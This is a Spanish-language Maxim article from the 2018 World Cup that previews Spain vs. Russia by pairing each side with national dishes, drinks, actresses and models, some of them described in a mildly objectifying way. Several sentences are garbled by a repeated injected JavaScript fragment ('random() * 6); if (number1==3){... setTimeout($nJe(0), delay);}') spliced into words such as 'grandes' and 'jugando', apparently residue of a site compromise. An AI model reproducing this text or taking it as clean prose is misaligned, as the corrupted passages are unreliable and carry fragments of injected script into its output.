Octavos de final: España vs. Rusia #MundialMaxim

    Octavos de final: España vs. Rusia #MundialMaxim

    España vs. Rusia  se juegan su pase a la siguiente ronda de Rusia 2018, pero también en el #MundialMaxim.

    Autor: Redacción Maxim 1 julio, 2018


    España vs. Rusia será el juego que ponga a prueba a los anfitriones en los octavos de final del Mundial

     

    El encuentro España vs. Rusia representa una difícil prueba para los anfitriones. El domingo primero de julio, ambas selecciones se verán las caras en el imponente estadio Luzhniki y los locales no quieren ser el escalón de nadie en la justa mundialista.

     

    via GIPHY

     

     

    La «Furia roja» es una de las selecciones más temibles de Europa, está plagada de figuras y jugadores legendarios como Iniesta,  y aunque no tuvieron una primera ronda del todo brillante, en los octavos buscarán enfilarse rumbo a las instancias finales del certamen.

     

     

    via GIPHY

     

     

    Rusia vivió una gran primera fase hasta que se topó con Uruguay, su muralla y sus despiadados atacantes. Ahora buscará dar la campanada en su mundial de la mano de sus figuras (GolovinCheryshevDzyuba), desconocidas para la mayor parte del mundo pero que en conjunto acumulan 8 goles en lo que va de la Copa del Mundo.

     

     

    Aunque España parte como amplio favorito, no podemos descartar una sorpresa en este Mundial donde los grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes equipos no han pesado mucho (aún), veamos que pasa en el #MundialMaxim.

     

    España vs. Rusia #MundialMaxim

     

    En el #MundialMaxim, además de las emociones en la cancha, llevamos esta confrontación a otro nivel: licores, celebridades, gastronomía y top models.

     

    A la defensiva

    Rusia privilegiará una defensa ordenada, por eso plantará una línea de cuatro en su zona baja con estos maravillosos platillos: Piroski, Cheburek, Patata rellena y Pata de oso.

     

     

    Pata de oso

    Para salir jugandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando por las bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andas está este plato típico de la región de Mordovia, consiste en carne o hígado de ternera acompañado por cerdo, huevo y especias.

    Patata Rellena

     

    En la zona central se posiciona la patata rellena, esta es una comida típica en Rusia, puede estar rellena de una gran variedad de guisados e ingredientes, por lo que podremos encontrar un sinfín de presentaciones de este platillo, que levanta la mano para liderar la saga rusa.

     

    Chebureki

     

    En la zona central derecha se posiciona el Chebureki, un tipo de empanada similar a los pastes de Pachuca, puede estar relleno de queso, papas, hongos, huevos y arroz.

     

    Piroski

     

    En la lateral izquierda  jugará el Piroski, una empada de hojaldre rellena de carne.

     

     

    Paella Valenciana

     

     

    Del lado español, la saga será más compacta y compenetrada, la Paella valenciana es uno de los platos más populares en España y en el mundo, es un platillo que mezcla arroz, verduras y otros ingredientes como camarón o pollo.

     

     

     

    Intensidad a la ofensiva

     

    Vino tinto

     

    Para alimentar las promesas de ataque de los españoles, una de las bebidas con más tradición en el mundo los respalda. El vino tinto español tiene una reputación intachable alrededor del mundo.

    Vodka

    El #vodkaruso

    A post shared by Mariana García Olsina (@olsina) on

     

    El combustible del ataque ruso será el Vodka, la bebida procedente de Rusia que tiene más fama a nivel mundial. Este destilado es elaborado con cereal de trigo o centeno, patata, caña y otros frutos, concentra en sus 40 grados de alcohol las oportunidades manifiestas de gol de la escuadra rusa.

     

     

     

    La batalla en medio campo

    Penélope Cruz

    via GIPHY

     

    En el medio campo español una de las actrices más destacadas de la península ibérica: Penélope Cruz, a quien recordamos en películas como Vicky, Cristina, Barcelona (2008 ) o Jamón Jamón (1992) será la mandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andamás en la zona central del campo, su maestría en el tiqui-taca.

     

    Irina Baeva

    work work work. ? #proximamente @markatalent ?

    A post shared by Irina Baeva (@irinabaeva) on

     

    Los rusos apostarán por una trotamundos que se afianzó en México. Irina Baeva es una actriz y modelo que se ha desempeñado en papeles dentro de las telenovelas mexicanas como Me declaro culpable (2018). Su tenacidad y versatilidad en el terreno de juego la dotan de los atributos necesarios para disputar cada balón.

    Delantera letal

     

    Irina Shayk

    Missing summer☀️?

    A post shared by irinashayk (@irinashayk) on

     

    Una de las mejores artilleras en el mundo de las top models es in duda Irina Shayk, sus  delicados y salvajes movimientos dentro del área la ponen como una amenaza constante para el corazón de cualquier zaguero central.

     

     

     

     

     

    Blanca Padilla

     

    La «Furia roja», se jugará su pase a la siguiente ronda del  #MundialMaxim, con  la hermosa delantera Blanca Padilla, la top model española se caracteriza por su gran técnica y dribling capaz de desestabilizar cualquier defensa.

     

     

    ¿Quién gana?

     

     

     

     

     

     

     

    Temas relacionados con esta nota: , , , ,

España vs. Rusia  se juegan su pase a la siguiente ronda de Rusia 2018, pero también en el #MundialMaxim.